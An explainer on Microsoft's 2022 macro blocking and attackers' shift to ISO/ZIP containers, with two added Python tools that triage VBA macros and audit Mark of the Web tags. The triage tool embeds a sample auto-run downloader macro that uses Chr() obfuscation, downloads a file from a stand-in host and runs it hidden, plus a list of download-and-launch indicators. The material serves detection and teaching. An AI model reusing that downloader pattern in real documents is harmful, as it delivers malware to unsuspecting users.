How Microsoft shut down cybercriminals' favourite infection technique

Is this the twilight of one of cybercriminals' favourite techniques? According to cybersecurity firm Proofpoint, between October 2021 and June 2022 attackers reduced their use of VBA (Visual Basic for Applications) and XL4 (Excel 4.0) macros by 66%. Behind these technical names is a scripting system built into the Microsoft Office applications (Word, Excel, PowerPoint and others) that lets users automate routine tasks such as refreshing figures from a database or generating reports.

Essential to the daily work of the HR and marketing departments of thousands of companies, macros have also been exploited since the 2010s by cybercriminals, to the point of becoming the most widely used mechanism for the initial infection of victims. After years of not addressing the problem head-on, Microsoft has been working on it since October 2021, with success. According to Proofpoint, it is “one of the biggest changes in the email threat landscape in recent history”. The problem: criminals have shifted their efforts to other infection techniques.


The trap of Office macros has finally been disarmed

In February 2022, Microsoft quietly announced that it would change the default macro settings for Office files received over the Internet. This long-awaited change was welcomed by the entire cybersecurity community. Specifically, Microsoft removed the one-click button that let any user enable macros themselves. If a file contained a malicious macro, a single click on the “Enable Content” bar shown when the document opened was enough, and the damage was done. Since the change, that interaction is no longer possible: the yellow bar has been replaced by a red warning that offers no way to run the macros. In practice, the user now has to go through the administrator of the company network, who can allow macros only through policy, a trusted location or a trusted signing certificate, which greatly limits the risk of falling into a trap and launching the deployment of malicious software.

If the operators behind the biggest malware families, such as Emotet or Dridex, have relied so heavily on this method of attack, it is because it brings many advantages. First, it lets them slip past the antivirus scanners built into email services. And for good reason: the malicious Excel or Word file does not contain the malware itself. The macro is just a small piece of code, a downloader, which when enabled fetches the real malware from a remote server and launches it. Determining from the file alone what a macro will do requires a level of analysis that is hard to automate, all the more so because cybercriminals obfuscate their macros to prevent anyone from understanding them.
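To make the downloader pattern concrete, here is an added example (not code from the article or from Proofpoint) in Python: a small static triage routine that looks for the auto-execution entry points, the download-and-launch primitives and two common obfuscation tricks (character-code chains and split string literals) in VBA source, and undoes the obfuscation so the hidden download URL becomes visible. The macro text it is run on is constructed for the demonstration and points at a reserved `.invalid` domain; the indicator list and scoring are illustrative heuristics, not a definitive signature set.

```python
"""Static triage of a VBA macro module: find auto-execution entry points, the
download-and-run primitives a downloader needs, and undo Chr() chains and
split string literals so the hidden URL shows up.  Added example; the macro
text at the bottom is constructed, not taken from a real sample."""
import re

# Procedure names that Office runs by itself when a document opens or closes.
AUTOEXEC = {"autoopen", "auto_open", "document_open", "workbook_open",
            "autoclose", "auto_close", "document_close", "workbook_beforeclose"}

# Building blocks of a typical downloader macro, keyed by lower-case substring.
INDICATORS = {
    "urldownloadtofile": "HTTP download to disk (urlmon)",
    "msxml2.xmlhttp": "HTTP client COM object",
    "adodb.stream": "binary file write",
    "createobject": "late-bound COM object creation",
    "wscript.shell": "process launch via WScript",
    "shell": "process launch",
    "powershell": "PowerShell invocation",
    "environ": "environment lookup (drop path such as %TEMP%)",
}

CHR_CALL = re.compile(r"Chr\(\s*(\d+)\s*\)", re.I)
CHR_CHAIN = re.compile(r"Chr\(\s*\d+\s*\)(?:\s*[&+]\s*Chr\(\s*\d+\s*\))*", re.I)
LITERAL_JOIN = re.compile(r'"([^"]*)"\s*[&+]\s*"([^"]*)"')
URL = re.compile(r'https?://[^\s"\']+', re.I)
PROC = re.compile(r"^\s*(?:private\s+|public\s+)?(?:sub|function)\s+(\w+)", re.I | re.M)


def deobfuscate(src: str) -> str:
    """Turn Chr(104) & Chr(116) ... into "ht..." and merge "a" & "b" into "ab"."""
    out = CHR_CHAIN.sub(
        lambda m: '"' + "".join(chr(int(c)) for c in CHR_CALL.findall(m.group(0))) + '"',
        src)
    while True:  # repeat until no adjacent literals are left to merge
        merged = LITERAL_JOIN.sub(r'"\1\2"', out)
        if merged == out:
            return out
        out = merged


def triage_vba(src: str) -> dict:
    """Findings for one macro module: triggers, indicators, URLs and a verdict."""
    clean = deobfuscate(src)
    low = clean.lower()
    triggers = [p for p in PROC.findall(clean) if p.lower() in AUTOEXEC]
    hits = {k: v for k, v in INDICATORS.items() if k in low}
    urls = URL.findall(clean)
    obfuscated = CHR_CALL.search(src) is not None
    score = 2 * len(triggers) + len(hits) + 2 * len(urls) + (2 if obfuscated else 0)
    if triggers and urls and hits:
        verdict = "likely downloader"   # runs by itself, fetches something, launches it
    elif score >= 4:
        verdict = "suspicious"
    else:
        verdict = "low"
    return {"auto_exec": triggers, "indicators": hits, "urls": urls,
            "chr_obfuscation": obfuscated, "score": score, "verdict": verdict}


# Constructed sample: a downloader whose URL is hidden behind Chr() and string splitting.
SAMPLE_MACRO = r'''
Private Sub Document_Open()
    Dim u As String, p As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & "://" & "example" & ".invalid/" & "p.exe"
    p = Environ("TEMP") & "\upd.exe"
    URLDownloadToFile 0, u, p, 0, 0
    Shell p, vbHide
End Sub
'''

# Constructed sample of the legitimate kind of macro the article mentions.
BENIGN_MACRO = r'''
Sub RefreshFigures()
    ActiveWorkbook.RefreshAll
End Sub
'''

if __name__ == "__main__":
    for name, code in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, triage_vba(code))
```

Run as a script it prints the findings for both samples; the interesting part is that the URL only appears after `deobfuscate()`, which is exactly why a scanner that reads the macro text literally sees nothing worth blocking.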

Second, this method of infection requires little technical skill, which makes it possible to mobilise a large workforce of newcomers. It takes only a few brains to write the macros and set up the infection infrastructure; after that, anyone can launch attacks. All they have to do is write a convincing email (posing as a colleague or a client, for example) that encourages the target to open the attachment and enable the macros. The more personalised the email is for the victim, the more likely it is to hit the mark.

Cybercriminals are adapting

From Microsoft's first announcements in October 2021, cybercriminals began to adapt their methods. According to Proofpoint researchers, they turned to “container files”, such as ISO (.iso), RAR (.rar) or ZIP (.zip) archives, which wrap other files, in order to get around the new macro blocking. Specifically, these formats prevent the Office applications from seeing the “Mark of the Web” (MOTW) tag on the files that contain the malicious macros. That tag indicates that a file was downloaded from the Internet, and it is what triggers the default blocking of macros.

Concretely, when the victim downloads a ZIP or ISO file, the container itself receives the MOTW tag. But when the victim opens it, the documents inside are not tagged, because Windows does not consider them to have been downloaded from the Internet. Cybercriminals can therefore use this Trojan-horse packaging to deliver an Excel file with malicious macros that the victim can still enable, because the new protection is never triggered. Whether the tag survives depends on the tool that unpacks the container: Windows' own ZIP extraction copies it to the extracted files, whereas mounting an ISO image or using some third-party archivers of the time did not, which is why ISO images in particular became popular. The container can also carry .lnk, .dll or .exe files that contain the malware directly.
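The MOTW tag the article describes is, on NTFS, an alternate data stream named `Zone.Identifier` attached to the downloaded file, with a small INI-style body. The following added example (written for this page, not code from the article or from Microsoft) parses that stream, decides whether Office's new default would block macros for a given file, re-applies the tag to a file that was unpacked without it, and walks a folder of unpacked container contents to list macro-capable Office files that carry no tag. The sample stream text is constructed; reading or writing the stream only works on NTFS, so on any other file system every file simply reports as untagged.

```python
"""Mark of the Web (MOTW) inspection.  On NTFS the tag is an alternate data
stream called Zone.Identifier with an INI body ([ZoneTransfer] / ZoneId=3 ...).
Office's Feb 2022 default blocks macros when that stream says the file came
from the Internet (zone 3) or Restricted Sites (zone 4).  Files unpacked from
a container by a tool that does not propagate the stream have no tag at all.
Added example; SAMPLE_STREAM is constructed, not captured from a real download."""
import os
import sys

# Office formats that can carry VBA or XL4 macros.
MACRO_CAPABLE = {".doc", ".dot", ".docm", ".dotm", ".xls", ".xlt", ".xlsm",
                 ".xltm", ".xlam", ".xlsb", ".ppt", ".pptm", ".potm"}
# URLMON security zones: 0 My Computer, 1 Intranet, 2 Trusted, 3 Internet, 4 Restricted.
BLOCKED_ZONES = {3, 4}

# Constructed example of the stream a browser leaves on a downloaded file.
SAMPLE_STREAM = ("[ZoneTransfer]\r\nZoneId=3\r\n"
                 "ReferrerUrl=https://mail.example.invalid/\r\n"
                 "HostUrl=https://cdn.example.invalid/invoice.zip\r\n")


def parse_zone_identifier(text: str) -> dict:
    """Parse the stream body; keys are lower-cased and ZoneId becomes an int."""
    info, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "zonetransfer" and "=" in line:
            key, val = line.split("=", 1)
            info[key.strip().lower()] = val.strip()
    if "zoneid" in info:
        info["zoneid"] = int(info["zoneid"])
    return info


def read_motw(path: str):
    """Parsed Zone.Identifier stream for path, or None when there is none.
    Alternate data streams exist only on NTFS, so this is always None elsewhere."""
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as f:
            return parse_zone_identifier(f.read())
    except OSError:
        return None


def macros_blocked_by_default(motw) -> bool:
    """Would Office's internet-macro block fire for a file carrying this tag?"""
    return motw is not None and motw.get("zoneid") in BLOCKED_ZONES


def tag_as_internet(path: str) -> None:
    """Re-apply the tag to a file unpacked without it (defensive use, NTFS only)."""
    if os.name != "nt":
        raise OSError("Zone.Identifier streams require NTFS on Windows")
    with open(path + ":Zone.Identifier", "w", newline="") as f:
        f.write("[ZoneTransfer]\r\nZoneId=3\r\n")


def audit_folder(folder: str) -> list:
    """(path, zone id or None, blocked?) for each macro-capable Office file below folder."""
    rows = []
    for root, _, files in os.walk(folder):
        for name in files:
            if os.path.splitext(name)[1].lower() in MACRO_CAPABLE:
                path = os.path.join(root, name)
                motw = read_motw(path)
                zone = motw.get("zoneid") if motw else None
                rows.append((path, zone, macros_blocked_by_default(motw)))
    return rows


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, zone, blocked in audit_folder(target):
        if blocked:
            status = f"blocked (zone {zone})"
        elif zone is None:
            status = "untagged: Enable Content still offered"
        else:
            status = f"zone {zone}: not blocked"
        print(f"{status:40} {path}")
```

Pointing the script at the folder where an ISO was mounted or an archive was unpacked shows the article's point directly: the container on the desktop is tagged with zone 3, while the spreadsheet inside reports as untagged. `tag_as_internet()` is the corresponding defensive move, putting the tag back so that Office treats the file as if it had been downloaded.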

However, this new method has its disadvantages. It requires more clicks from the victim, which gives them more time to realise that the file is suspicious. Users are also warier of a file with an extension they do not recognise than of a Word or Excel document, since they open several of those every day. Suffice it to say that the change made by Microsoft has complicated the task of cybercriminals.